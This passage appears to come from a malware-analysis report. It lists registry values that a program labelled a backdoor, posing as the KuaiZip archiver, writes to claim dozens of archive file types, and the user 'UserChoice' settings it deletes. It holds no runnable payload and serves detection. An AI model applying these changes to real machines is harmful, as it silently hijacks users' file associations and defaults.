[HKCR\KuaiZip.079\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.007]
"set" = "1"

[HKCR\KuaiZip.087\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\.043]
"(Default)" = "KuaiZip.043"

[HKCR\KuaiZip.09\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.z]
"(Default)" = "快压 Z 压缩文件"

[HKCR\.045]
"(Default)" = "KuaiZip.045"

[HKCR\KuaiZip.076\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.078]
"(Default)" = "快压 078 压缩文件"

[HKCR\KuaiZip.026]
"(Default)" = "快压 026 压缩文件"

[HKCR\KuaiZip.7z\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.005\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.077]
"(Default)" = "快压 077 压缩文件"

[HKCR\KuaiZip.062]
"(Default)" = "快压 062 压缩文件"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.076]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.045]
"set" = "1"

[HKCR\KuaiZip.036\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.081]
"set" = "1"

[HKCR\KuaiZip.007\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.066]
"(Default)" = "快压 066 压缩文件"

[HKCR\KuaiZip.089\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.001]
"(Default)" = "快压 001 压缩文件"

[HKCR\KuaiZip.051\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.rpm]
"set" = "1"

[HKCR\KuaiZip.008\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.081]
"(Default)" = "快压 081 压缩文件"

[HKCR\KuaiZip.05]
"(Default)" = "快压 05 压缩文件"

[HKCR\.011]
"(Default)" = "KuaiZip.011"

[HKCR\KuaiZip.027\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.013]
"(Default)" = "快压 013 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.031]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.039\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.zip\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.059\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.021\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.07]
"set" = "1"

[HKCR\KuaiZip.cab]
"(Default)" = "快压 CAB 压缩文件"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCR\KuaiZip.003\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.054\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.069\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.tgz\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.068]
"(Default)" = "快压 068 压缩文件"

[HKCR\.005]
"(Default)" = "KuaiZip.005"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.052]
"set" = "1"

[HKCR\KuaiZip.056]
"(Default)" = "快压 056 压缩文件"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.077]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.058]
"set" = "1"

[HKCR\.081]
"(Default)" = "KuaiZip.081"

[HKCR\KuaiZip.06]
"(Default)" = "快压 06 压缩文件"

[HKCR\KuaiZip.mou\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.031\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.031]
"set" = "1"

[HKCR\.bz2]
"(Default)" = "KuaiZip.bz2"

[HKCR\.069]
"(Default)" = "KuaiZip.069"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.033]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.034]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.066]
"set" = "1"

[HKCR\.029]
"(Default)" = "KuaiZip.029"

[HKCR\KuaiZip.070\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.015]
"(Default)" = "快压 015 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.lzh]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.033]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.051]
"(Default)" = "快压 051 压缩文件"

[HKCR\.05]
"(Default)" = "KuaiZip.05"

[HKCR\.rpm]
"(Default)" = "KuaiZip.rpm"

[HKCR\KuaiZip_FileAsso.Origin\.036]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.088]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.tbz]
"set" = "1"

[HKCR\KuaiZip.097\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.018\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.070]
"set" = "1"

[HKCR\KuaiZip.088\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.072\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.086]
"(Default)" = "快压 086 压缩文件"

[HKCR\KuaiZip.lzh\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.008\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.026\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.016\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.039]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.070]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.028]
"set" = "1"

[HKCR\.04]
"(Default)" = "KuaiZip.04"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.084]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.026]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.041]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.017\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.052]
"(Default)" = "KuaiZip.052"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.071]
"set" = "1"

[HKCR\KuaiZip.012]
"(Default)" = "快压 012 压缩文件"

[HKCR\.082]
"(Default)" = "KuaiZip.082"

[HKCR\KuaiZip.095\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.095]
"(Default)" = "快压 095 压缩文件"

[HKCR\KuaiZip.072\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.094]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.016]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.094\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.006\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.080\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.043\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.054]
"(Default)" = "KuaiZip.054"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.gzip]
"set" = "1"

[HKCR\KuaiZip.075\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.052\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.015\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\.071]
"(Default)" = "KuaiZip.071"

[HKCR\KuaiZip.029\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.7z]
"set" = "1"

[HKCR\KuaiZip.rar\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,4"

[HKCR\KuaiZip.086\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.mou]
"(Default)" = "快压 MOU 压缩文件"

[HKCR\.053]
"(Default)" = "KuaiZip.053"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.09]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.049]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.045]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.009]
"set" = "1"

[HKCR\KuaiZip.rpm]
"(Default)" = "快压 RPM 压缩文件"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.087]
"set" = "1"

[HKCR\KuaiZip.07\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.065]
"(Default)" = "快压 065 压缩文件"

[HKCR\KuaiZip.063]
"(Default)" = "快压 063 压缩文件"

[HKCR\KuaiZip.tgz]
"(Default)" = "快压 TGZ 压缩文件"

[HKCR\.7z]
"(Default)" = "KuaiZip.7z"

[HKCR\.arj]
"(Default)" = "KuaiZip.arj"

[HKCR\KuaiZip.002\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.034\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.rpm]
"(Default)" = "NoAssociate.KZ"

[HKCR\.026]
"(Default)" = "KuaiZip.026"

[HKCR\KuaiZip.045\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.jar\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.rar]
"(Default)" = "KuaiZip.rar"

[HKCR\KuaiZip_FileAsso.Origin\.006]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.056]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.01\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.067]
"(Default)" = "NoAssociate.KZ"

[HKCR\.034]
"(Default)" = "KuaiZip.034"

[HKCR\KuaiZip.092\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.tbz\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.085\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.095]
"set" = "1"

[HKCR\KuaiZip.045\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.040]
"set" = "1"

[HKCR\KuaiZip.042]
"(Default)" = "快压 042 压缩文件"

[HKCR\.003]
"(Default)" = "KuaiZip.003"

[HKCR\KuaiZip.097\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.025\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.032]
"(Default)" = "KuaiZip.032"

[HKCR\KuaiZip.060\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.zip]
"(Default)" = "CompressedFolder"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.068]
"set" = "1"

[HKCR\KuaiZip.062\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\.056]
"(Default)" = "KuaiZip.056"

[HKCR\.025]
"(Default)" = "KuaiZip.025"

[HKCR\KuaiZip_FileAsso.Origin\.z]
"(Default)" = ""

[HKCU\Software\KuaiZip\KuaiZip\Setup\.078]
"set" = "1"

[HKCR\.035]
"(Default)" = "KuaiZip.035"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.042]
"set" = "1"

[HKCR\KuaiZip.07]
"(Default)" = "快压 07 压缩文件"

[HKCR\KuaiZip.025\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.010]
"(Default)" = "快压 010 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.063]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.068\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.046]
"(Default)" = "快压 046 压缩文件"

[HKCR\.068]
"(Default)" = "KuaiZip.068"

[HKCR\KuaiZip.096\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.075]
"(Default)" = "快压 075 压缩文件"

[HKCR\.gzip]
"(Default)" = "KuaiZip.gzip"

[HKCR\KuaiZip.tbz]
"(Default)" = "快压 TBZ 压缩文件"

[HKCR\KuaiZip.098]
"(Default)" = "快压 098 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.023]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.053]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.010\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.7z]
"(Default)" = "快压 7Z 压缩文件"

[HKCR\.012]
"(Default)" = "KuaiZip.012"

[HKCR\KuaiZip.03\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.081]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.099\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.064]
"(Default)" = "KuaiZip.064"

[HKCR\.036]
"(Default)" = "KuaiZip.036"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.024]
"set" = "1"

[HKCR\KuaiZip.003]
"(Default)" = "快压 003 压缩文件"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.036]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.071]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.094]
"set" = "1"

[HKCR\KuaiZip.084\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.037\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.034]
"(Default)" = "快压 034 压缩文件"

[HKCR\KuaiZip.023\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.039]
"(Default)" = "快压 039 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.069]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.099]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.064]
"set" = "1"

[HKCR\KuaiZip.064\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.089\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.01\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 6B 92 5D 06 D5 FF D3 A7 EE 71 F4 6D 3A A0 8E"

[HKCR\KuaiZip.gzip\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.019\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\.jar]
"(Default)" = "KuaiZip.jar"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.082]
"set" = "1"

[HKCR\.tbz]
"(Default)" = "KuaiZip.tbz"

[HKCR\KuaiZip_FileAsso.Origin\.001]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.089]
"set" = "1"

[HKCR\KuaiZip.cab\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.091]
"(Default)" = "NoAssociate.KZ"

[HKCR\.070]
"(Default)" = "KuaiZip.070"

[HKCR\KuaiZip.010\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.tbz\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.041\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.048]
"(Default)" = "NoAssociate.KZ"

[HKCR\.030]
"(Default)" = "KuaiZip.030"

[HKCR\KuaiZip.031]
"(Default)" = "快压 031 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.043]
"(Default)" = "NoAssociate.KZ"

[HKCR\.006]
"(Default)" = "KuaiZip.006"

[HKCR\KuaiZip.047\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.054]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.005]
"(Default)" = "NoAssociate.KZ"

[HKCR\.098]
"(Default)" = "KuaiZip.098"

[HKCR\KuaiZip_FileAsso.Origin\.009]
"(Default)" = "NoAssociate.KZ"

[HKCR\.057]
"(Default)" = "KuaiZip.057"

[HKCR\KuaiZip.020]
"(Default)" = "快压 020 压缩文件"

[HKCR\KuaiZip.053]
"(Default)" = "快压 053 压缩文件"

[HKCR\KuaiZip.072]
"(Default)" = "快压 072 压缩文件"

[HKCR\KuaiZip.042\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.079]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.083\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.063]
"set" = "1"

[HKCR\KuaiZip.035\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.073\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.02]
"(Default)" = "快压 02 压缩文件"

[HKCR\KuaiZip.056\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.021\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.rar]
"(Default)" = "快压 RAR 压缩文件"

[HKCR\.004]
"(Default)" = "KuaiZip.004"

[HKCR\KuaiZip_FileAsso.Origin\.017]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.060]
"set" = "1"

[HKCR\KuaiZip.063\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.075]
"set" = "1"

[HKCR\KuaiZip.009\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.017]
"(Default)" = "快压 017 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.003]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.028]
"(Default)" = "快压 028 压缩文件"

[HKCR\KuaiZip.067\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.tbz]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.04\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.097]
"set" = "1"

[HKCR\.077]
"(Default)" = "KuaiZip.077"

[HKCR\KuaiZip.006\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.02]
"(Default)" = "KuaiZip.02"

[HKCR\KuaiZip.065\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.083]
"(Default)" = "KuaiZip.083"

[HKCR\KuaiZip_FileAsso.Origin\.068]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.027\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.016]
"(Default)" = "KuaiZip.016"

[HKCR\.087]
"(Default)" = "KuaiZip.087"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.085]
"set" = "1"

[HKCR\KuaiZip.041]
"(Default)" = "快压 041 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.065]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.010]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.022\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.047]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.lzh\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.024]
"(Default)" = "KuaiZip.024"

[HKCR\KuaiZip.043]
"(Default)" = "快压 043 压缩文件"

[HKCR\KuaiZip.002\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.004]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.bz2]
"set" = "1"

[HKCR\KuaiZip.054]
"(Default)" = "快压 054 压缩文件"

[HKCR\KuaiZip.079]
"(Default)" = "快压 079 压缩文件"

[HKCR\KuaiZip.090]
"(Default)" = "快压 090 压缩文件"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.02]
"set" = "1"

[HKCR\.kz]
"(Default)" = "KuaiZip.kz"

[HKCR\KuaiZip.060]
"(Default)" = "快压 060 压缩文件"

[HKCR\KuaiZip.084\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.094]
"(Default)" = "快压 094 压缩文件"

[HKCR\KuaiZip.055\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.057\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.022\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.lzh]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.018]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.020]
"set" = "1"

[HKCR\KuaiZip.002]
"(Default)" = "快压 002 压缩文件"

[HKCR\KuaiZip.018\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.007]
"(Default)" = "快压 007 压缩文件"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.044]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.gz]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.016]
"set" = "1"

[HKCR\KuaiZip.033]
"(Default)" = "快压 033 压缩文件"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.046]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.041]
"set" = "1"

[HKCR\KuaiZip.055\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.003]
"set" = "1"

[HKCR\KuaiZip.058]
"(Default)" = "快压 058 压缩文件"

[HKCR\KuaiZip.088\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.087]
"(Default)" = "快压 087 压缩文件"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.05]
"set" = "1"

[HKCR\KuaiZip.040\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.arj\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.018]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.019]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.048\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.042\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.044\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.072\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.08]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.047\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gzip]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tbz\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.078\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.020\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.015]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.070\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.086]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.059]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.045]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.039]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jar]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.053]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.035\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.082]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mou]
"Progid"

